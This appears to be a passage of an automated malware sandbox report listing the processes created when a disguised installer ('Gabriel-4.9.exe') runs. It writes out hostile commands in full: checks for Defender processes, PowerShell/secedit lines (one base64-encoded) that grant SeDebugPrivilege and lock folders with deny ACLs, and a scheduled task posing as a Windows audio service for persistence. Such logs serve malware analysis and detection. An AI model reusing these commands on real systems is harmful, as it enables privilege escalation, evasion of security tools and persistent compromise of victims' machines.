Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Process created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5572466 "__IRAFN:C:\Users\user\Desktop\Gabriel-4.9.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=3220').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\inst.ini
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
